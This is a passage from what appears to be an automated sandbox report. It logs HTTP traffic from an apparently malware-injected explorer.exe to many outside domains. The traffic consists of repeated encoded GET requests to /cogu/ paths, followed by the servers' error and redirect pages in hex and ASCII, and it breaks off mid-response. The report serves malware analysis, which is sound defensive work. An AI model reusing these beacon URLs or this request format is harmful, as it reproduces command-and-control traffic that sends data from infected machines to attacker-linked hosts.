3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49794	103.164.172.49	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:48:21.656261921 CEST	6505	OUT	GET /cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC HTTP/1.1 Host: www.taichan.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:48:21.828289986 CEST	6506	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 13:48:21 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49795	172.67.139.41	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:48:26.950541973 CEST	6506	OUT	GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC HTTP/1.1 Host: www.researchlearningspirit.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:48:26.968235970 CEST	6507	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Oct 2021 13:48:26 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 13 Oct 2021 14:48:26 GMT Location: https://www.researchlearningspirit.xyz/cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EPdfvNLkTU5RZ9UQSM2hjuuiXtnmAqHhkSzgbWAURkyGpFN9juWpB0j%2F6AuHgKSjToaDhfW7DPyUcgfufXGw%2FuV%2FiRV2197%2BxMtQWpV5A5wBks4g38naGBGFMna0OjaPFZSeE4D1swsfw78%2FsUar7SQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69d9068c7ca0704c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.11.20	49796	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:48:32.017185926 CEST	6508	OUT	GET /cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC HTTP/1.1 Host: www.bestofnapa.guide Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:48:32.123902082 CEST	6509	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 13:48:32 GMT Content-Type: text/html Content-Length: 275 ETag: "615f9601-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.11.20	49797	154.195.206.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:48:37.944444895 CEST	6509	OUT	GET /cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC HTTP/1.1 Host: www.bqgfk.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:48:38.217724085 CEST	6510	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 13 Oct 2021 13:48:38 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.11.20	49798	198.59.144.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:48:44.118815899 CEST	6511	OUT	GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC HTTP/1.1 Host: www.centralcontable.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:48:44.254714966 CEST	6511	IN	HTTP/1.1 302 Found Date: Wed, 13 Oct 2021 13:48:44 GMT Server: Apache Content-Security-Policy: upgrade-insecure-requests; Location: https://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC Content-Length: 311 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 6e 74 72 61 6c 63 6f 6e 74 61 62 6c 65 2e 6e 65 74 2f 63 6f 67 75 2f 3f 45 36 3d 37 65 61 7a 61 2b 56 6d 38 79 59 65 6d 73 79 7a 2f 7a 7a 77 6a 57 72 6b 6c 63 38 59 69 35 48 6f 35 48 58 35 54 4e 4d 37 61 6c 6c 52 34 75 72 68 4a 72 6d 52 47 34 59 56 2f 34 38 71 30 62 53 65 66 4f 37 37 26 61 6d 70 3b 45 56 70 64 46 3d 44 36 41 6c 57 68 43 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.11.20	49799	185.73.226.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:48:49.675554037 CEST	6512	OUT	GET /cogu/?E6=RrpHjQu0LYHaKA/4jQL7YSE8Zlpf0+V6RMywmZjWIXP7087B5zoOXLZv/c2UnXWK/cWX&EVpdF=D6AlWhC HTTP/1.1 Host: www.mobileiranian2.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:48:49.861639023 CEST	6513	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Oct 2021 13:48:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Redirect-By: WordPress Location: https://www.mobileiranian2.com/cogu/?E6=RrpHjQu0LYHaKA/4jQL7YSE8Zlpf0+V6RMywmZjWIXP7087B5zoOXLZv/c2UnXWK/cWX&EVpdF=D6AlWhC Vary: User-Agent

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.11.20	49800	151.101.192.119	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:48:55.404741049 CEST	6514	OUT	GET /cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC HTTP/1.1 Host: www.soymilk-design.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:48:55.515916109 CEST	6514	IN	HTTP/1.1 301 Moved Permanently server: adobe location: http://soymilk-design.com/cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC cache-control: s-maxage=31536000 x-trace-id: MJ2XmihojrTHhT/ccEILiuW7me4 x-app-name: Pro2-Renderer x-xss-protection: 1; mode=block x-content-type-options: nosniff Content-Length: 0 Accept-Ranges: bytes Date: Wed, 13 Oct 2021 13:48:55 GMT Via: 1.1 varnish Age: 0 Connection: close X-Served-By: cache-mxp6949-MXP X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1634132935.407613,VS0,VE104 Vary: Fastly-SSL, X-Use-Renderer

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.11.20	49801	198.54.117.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:49:00.787650108 CEST	6515	OUT	GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1 Host: www.domainair.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.11.20	49802	204.141.43.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:49:06.411268950 CEST	6516	OUT	GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1 Host: www.nazfoodstuff.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:49:06.582165956 CEST	6517	IN	HTTP/1.1 404 Server: ZGS Date: Wed, 13 Oct 2021 13:49:06 GMT Content-Type: text/html Content-Length: 4647 Connection: close Set-Cookie: 0cea9df7db=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/ X-XSS-Protection: 1 Set-Cookie: csrfc=cf50af7f-1f40-477c-9dee-0eacb66e81ce;path=/;priority=high Set-Cookie: _zcsr_tmp=cf50af7f-1f40-477c-9dee-0eacb66e81ce;path=/;SameSite=Strict;priority=high Pragma: no-cache Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
Oct 13, 2021 15:49:06.582230091 CEST	6519	IN	Data Raw: 32 70 78 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
Oct 13, 2021 15:49:06.582276106 CEST	6520	IN	Data Raw: 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
Oct 13, 2021 15:49:06.582320929 CEST	6521	IN	Data Raw: 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49824	172.217.168.46	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.11.20	49803	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:49:11.624213934 CEST	6522	OUT	GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1 Host: www.cacaolixir.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:49:11.731408119 CEST	6522	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 13:49:11 GMT Content-Type: text/html Content-Length: 275 ETag: "615f9602-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.11.20	49804	66.96.130.148	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:49:17.017303944 CEST	6523	OUT	GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1 Host: www.fishermandm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:49:17.150295973 CEST	6524	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 13:49:17 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 